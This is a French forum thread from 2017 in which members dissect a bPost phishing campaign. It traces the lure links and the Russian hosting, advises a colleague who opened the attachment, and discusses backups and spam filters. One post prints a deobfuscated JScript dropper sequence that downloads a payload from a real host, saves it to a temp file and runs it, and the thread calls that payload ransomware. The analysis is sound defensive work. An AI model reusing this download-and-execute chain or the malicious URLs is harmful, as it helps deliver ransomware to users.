Programmation » bPost, le hack, ... et si on s'amusait un peu? :petrus:
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 01/02/2017 @ 14:16:56,
Par zionYup!
Ce matin, je reçois un joli scam pour bPost, dont on parle depuis quelques jours dans la presse et les réseaux sociaux. Curieux de nature, j'ai ouvert quelques pages pour voir un peu ce que le mec exécutait... (Et Clandestino joue aussi avec moi.).
On joue ensembles?
Alors, primo, le mail m'envoie sur:
my-dolls-ed.com/yvKxDe1Mo/ (listing oh mon ami)
qui en fait renvoie vers
r1je.bpost-server.org/sjeii.php?id=
Et puis donc on se prend un zip avec un js (qui semble targeter surtout IE).
Ce matin, je reçois un joli scam pour bPost, dont on parle depuis quelques jours dans la presse et les réseaux sociaux. Curieux de nature, j'ai ouvert quelques pages pour voir un peu ce que le mec exécutait... (Et Clandestino joue aussi avec moi.).
On joue ensembles?
Alors, primo, le mail m'envoie sur:
my-dolls-ed.com/yvKxDe1Mo/ (listing oh mon ami)
qui en fait renvoie vers
r1je.bpost-server.org/sjeii.php?id=
Et puis donc on se prend un zip avec un js (qui semble targeter surtout IE).
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 01/02/2017 @ 14:17:55,
Par zionPour rire:
host bpost-server.org
bpost-server.org has address 89.223.29.77
dig bpost-server.org
; <<>> DiG 9.10.4-P5-RedHat-9.10.4-4.P5.fc25 <<>> bpost-server.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39676
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;bpost-server.org. IN A
;; ANSWER SECTION:
bpost-server.org. 3517 IN A 89.223.29.77
;; Query time: 235 msec 8.8.4.4#53(8.8.4.4)
;; WHEN: mer. févr. 01 13:57:07 CET 2017
;; MSG SIZE rcvd: 61
host 89.223.29.77
77.29.223.89.in-addr.arpa domain name pointer 135883.simplecloud.club.
Ce serait donc un hébergement russe
host bpost-server.org
bpost-server.org has address 89.223.29.77
dig bpost-server.org
; <<>> DiG 9.10.4-P5-RedHat-9.10.4-4.P5.fc25 <<>> bpost-server.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39676
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;bpost-server.org. IN A
;; ANSWER SECTION:
bpost-server.org. 3517 IN A 89.223.29.77
;; Query time: 235 msec 8.8.4.4#53(8.8.4.4)
;; WHEN: mer. févr. 01 13:57:07 CET 2017
;; MSG SIZE rcvd: 61
host 89.223.29.77
77.29.223.89.in-addr.arpa domain name pointer 135883.simplecloud.club.
Ce serait donc un hébergement russe
Je suis le Roy
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 01/02/2017 @ 14:21:40,
Par ClandestinoA la base, on se télécharge un ZIP qui contient un gros JS bien obfusqué. Sauf qu'en grattant un peu, c'est de l'obfuscation basique. De là , on en déduit que :
- le virus ne cible que les utilisateurs IE car il nécéssite un ActiveXObject pour initialiser un Scripting.FileSystemObject.
- le js ouvre un MSXML.XMLHttpRequest pour télécharger un payload (lequel ? On doit encore creuser - probablement un script vbs)
- le js récupère le TEMP avec un GetTempName(), y crée un fichier où il injecte le contenu du payload, puis lui applique un WShell.execute()
Reste à piger le contenu du payload Je vais faire tourner le JS sur une VM isolée qui aura juste accès à bpost-server.org et à rien d'autre et monitorer l'injection du fichier créé par le JS pour pouvoir examiner son contenu.
Dernière édition: 01/02/2017 @ 14:27:56
- le virus ne cible que les utilisateurs IE car il nécéssite un ActiveXObject pour initialiser un Scripting.FileSystemObject.
- le js ouvre un MSXML.XMLHttpRequest pour télécharger un payload (lequel ? On doit encore creuser - probablement un script vbs)
- le js récupère le TEMP avec un GetTempName(), y crée un fichier où il injecte le contenu du payload, puis lui applique un WShell.execute()
Reste à piger le contenu du payload Je vais faire tourner le JS sur une VM isolée qui aura juste accès à bpost-server.org et à rien d'autre et monitorer l'injection du fichier créé par le JS pour pouvoir examiner son contenu.
Dernière édition: 01/02/2017 @ 14:27:56
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 01/02/2017 @ 15:29:47,
Par ClandestinoAlors, suite et fin :
- le payload est un ransomware/filelocker - donc une belle saloperie.
- voilà le script décomposé pour ceux que ça intéresse :
CreateObject(WScript.Shell)
CreateObject(MSXML2.XMLHTTP)
CreateObject(ADODB.Stream)
CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)
CreateObject(Scripting.FileSystemObject)->GetTempName()
CreateObject(MSXML2.XMLHTTP)->open(GET http://digifish3.com/alarg.vbn,0)
CreateObject(MSXML2.XMLHTTP)->send()
CreateObject(ADODB.Stream)->type=1
CreateObject(MSXML2.XMLHTTP)->ResponseBody
WScript->ScriptFullName
CreateObject(ADODB.Stream)->Open()
CreateObject(ADODB.Stream)->Write(CreateObject(MSXML2.XMLHTTP)->ResponseBody)
CreateObject(ADODB.Stream)->SaveToFile(CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName())
CreateObject(ADODB.Stream)->Close()
CreateObject(WScript.Shell)->run(cmd.exe /c CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName(),0)
Dernière édition: 01/02/2017 @ 15:46:03
- le payload est un ransomware/filelocker - donc une belle saloperie.
- voilà le script décomposé pour ceux que ça intéresse :
CreateObject(WScript.Shell)
CreateObject(MSXML2.XMLHTTP)
CreateObject(ADODB.Stream)
CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)
CreateObject(Scripting.FileSystemObject)->GetTempName()
CreateObject(MSXML2.XMLHTTP)->open(GET http://digifish3.com/alarg.vbn,0)
CreateObject(MSXML2.XMLHTTP)->send()
CreateObject(ADODB.Stream)->type=1
CreateObject(MSXML2.XMLHTTP)->ResponseBody
WScript->ScriptFullName
CreateObject(ADODB.Stream)->Open()
CreateObject(ADODB.Stream)->Write(CreateObject(MSXML2.XMLHTTP)->ResponseBody)
CreateObject(ADODB.Stream)->SaveToFile(CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName())
CreateObject(ADODB.Stream)->Close()
CreateObject(WScript.Shell)->run(cmd.exe /c CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName(),0)
Dernière édition: 01/02/2017 @ 15:46:03
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 01/02/2017 @ 18:25:35,
Par zionFranchement, à l'époque, il y avait une meilleure recherche de nos amis pirates pour obfusquer le tout, ici c'était encore assez "facile".
Je suis curieux de voir sur d'autres emails reçus pour cette vague si c'est toujours le même fichier, ou si ils s'éparpillent un peu partout pour rendre le truc plus complexe à fermer
Je suis curieux de voir sur d'autres emails reçus pour cette vague si c'est toujours le même fichier, ou si ils s'éparpillent un peu partout pour rendre le truc plus complexe à fermer
Je suis le Roy
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 09:26:37,
Par TangEt si quelqu'un a "malencontreusement" cliqué sur le lien et que le JS s'est mis sur le PC, ça se lance tout seul ce bazar ??
Donc oui, une de mes collègues (celle qui fait les commandes de timbres chez bpost - tiens le problème viendrait pas à la base de bpost qui se serait fait "usurper" une base de données...) a eu une réaction pour le moins bizarre :
- elle reçoit le mail ;
- me le transfert en me demandant si c'est "normal" ;
- je lui répond de le foutre poubelle direct ;
- elle me répond "too late"...
Je suis monter directement, elle m'a dit que ça avait mis un fichier sur le PC et je l'ai supprimé directement.
Il y a encore des risques ?
Apparemment rien ne s'est passé puisqu'on m'a pas encore appelé aujourd'hui pour me dire que son PC fonctionnait pas.
Et la cerise sur le gâteau, on travaille maintenant au bureau via un serveur sur lequel les utilisateurs se connecte avec leur poste de travail.
J'imagine la réaction si tout se bloque...
Maintenant peut-être que le firewall et autres "protections" mises en place ont fait leur boulot aussi.
Bref, si je peux vérifier quelque chose pour être sûr que tou est ok, je suis preneur.
Donc oui, une de mes collègues (celle qui fait les commandes de timbres chez bpost - tiens le problème viendrait pas à la base de bpost qui se serait fait "usurper" une base de données...) a eu une réaction pour le moins bizarre :
- elle reçoit le mail ;
- me le transfert en me demandant si c'est "normal" ;
- je lui répond de le foutre poubelle direct ;
- elle me répond "too late"...
Je suis monter directement, elle m'a dit que ça avait mis un fichier sur le PC et je l'ai supprimé directement.
Il y a encore des risques ?
Apparemment rien ne s'est passé puisqu'on m'a pas encore appelé aujourd'hui pour me dire que son PC fonctionnait pas.
Et la cerise sur le gâteau, on travaille maintenant au bureau via un serveur sur lequel les utilisateurs se connecte avec leur poste de travail.
J'imagine la réaction si tout se bloque...
Maintenant peut-être que le firewall et autres "protections" mises en place ont fait leur boulot aussi.
Bref, si je peux vérifier quelque chose pour être sûr que tou est ok, je suis preneur.
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 09:39:45,
Par zionNon, bPost ne s'est pas fait pirater, ils utilisent des DBs d'emails globales, ils spamment partout comme des porcs (comme ils l'ont fait par le passé en proposant des faux bons pour Ikea ou d'autres), en espérant toucher un maximum de pigeons
A priori celui sur lequel on est tombé, c'est un cryptoware/ransomware, et ça marche que avec IE, donc si par défaut son JS s'est ouvert sur Chrome ou Firefox, ça devrait pas être un soucis.
Tu peux toujours passer un coup de Windows Defender ou autre scan d'antivirus, mais dans le cas de ce genre d'infection, un ancien backup est la réponse la plus adéquate, donc... BACKUP
A priori celui sur lequel on est tombé, c'est un cryptoware/ransomware, et ça marche que avec IE, donc si par défaut son JS s'est ouvert sur Chrome ou Firefox, ça devrait pas être un soucis.
Tu peux toujours passer un coup de Windows Defender ou autre scan d'antivirus, mais dans le cas de ce genre d'infection, un ancien backup est la réponse la plus adéquate, donc... BACKUP
Je suis le Roy
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 09:45:57,
Par Dr_DanYep St-Petersbourg.
http://whois.domaintools.com/bpost-server.org
Pour une fois ce n'est pas hosté chez OVH
Pour le moment, mon anti-spam à du mal avec des mails venant de filles en manque voulant qu'on leur fasse la totale, d'offres d'emploi de directeur et des propositions d'essai d'une application qui me ferait gagner des millions à la bourse.
Mon anti-spam est un carriériste , vénal et pervers
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 09:57:40,
Par zionHa? Et ton anti spam c'est quoi?
J'étais sur du SpamAssassin de base jusqu'il y a peu, je l'ai boosté avec Cloudmark il y a quelques semaines (ça m'a coûté un rein), mais j'ai quasi plus aucun spam depuis, c'est le paradis
J'étais sur du SpamAssassin de base jusqu'il y a peu, je l'ai boosté avec Cloudmark il y a quelques semaines (ça m'a coûté un rein), mais j'ai quasi plus aucun spam depuis, c'est le paradis
Je suis le Roy
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 10:14:49,
Par Dr_DanC'est SA qui a toujours bien fonctionné jusqu'il y a quelques semaines. je vais devoir me plonger dans les logs et comprendre pourquoi certains mails sont
marqués comme spam et d'autres pas , alors qu'ils ont le même contenu..
marqués comme spam et d'autres pas , alors qu'ils ont le même contenu..
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 10:20:20,
Par TangC'est bien Chrome qui s'est ouvert.
Une bonne nouvelle donc.
La société qui gère l'IT fait des backup, sur un autre serveur, mais qui est aussi ici à l'étude (enfin sur des "cassettes" qu'on change tous les jours).
Une bonne nouvelle donc.
La société qui gère l'IT fait des backup, sur un autre serveur, mais qui est aussi ici à l'étude (enfin sur des "cassettes" qu'on change tous les jours).
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 10:49:46,
Par zionDr_Dan> Il m'en restait encore une 20aine par jour (sur des centaines filtrés ), le seul qui est passé ces derniers jours c'est une fois ce mail bPost
Tang> Si c'était le même que celui reçu, oui, zen
Tang> Si c'était le même que celui reçu, oui, zen
Je suis le Roy
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 14:57:14,
Par antpLe danger avec le randomware c'est que pendant qu'il chiffre tes données tu ne remarques parfois rien
Et pareil avec les backups : si tu bakcupes la version chiffrée d'un document à la place de sa version d'origine... (vaut mieux avoir un historique)
Et pareil avec les backups : si tu bakcupes la version chiffrée d'un document à la place de sa version d'origine... (vaut mieux avoir un historique)
mes programmes ·· les voitures dans les films ·· champion des excuses bidons
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 15:47:25,
Par zionRien de tel que le backup incrémental hein
Je suis le Roy
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 15:51:35,
Par Dr_DanDr_Dan> Il m'en restait encore une 20aine par jour (sur des centaines filtrés ), le seul qui est passé ces derniers jours c'est une fois ce mail bPost
Il en reste 5-6 spams non filtés par jour. Dans l'absolu c'est gérable , mais venant de zéro ,c'est frustrant
bPost, le hack, ... et si on s'amusait un peu? :petrus:
Publié le 02/02/2017 @ 16:01:22,
Par antpRien de tel que le backup incrémental hein
Bah oui, mais c'est pas évident pour tout le monde ; même en incrémental y en a qui n'ont pas les anciennes versions
Sinon pour le spam je suis content du filtre Gmail. J'ai peux de spams non détectés (même pas un par semaine), tout comme j'ai peu de faux-positifs (même pas un par mois, j'essaie de jeter un coup d'oeil régulier au dossier spam, j'en loupe peut-être), sur une bonne centaine de spams par jour.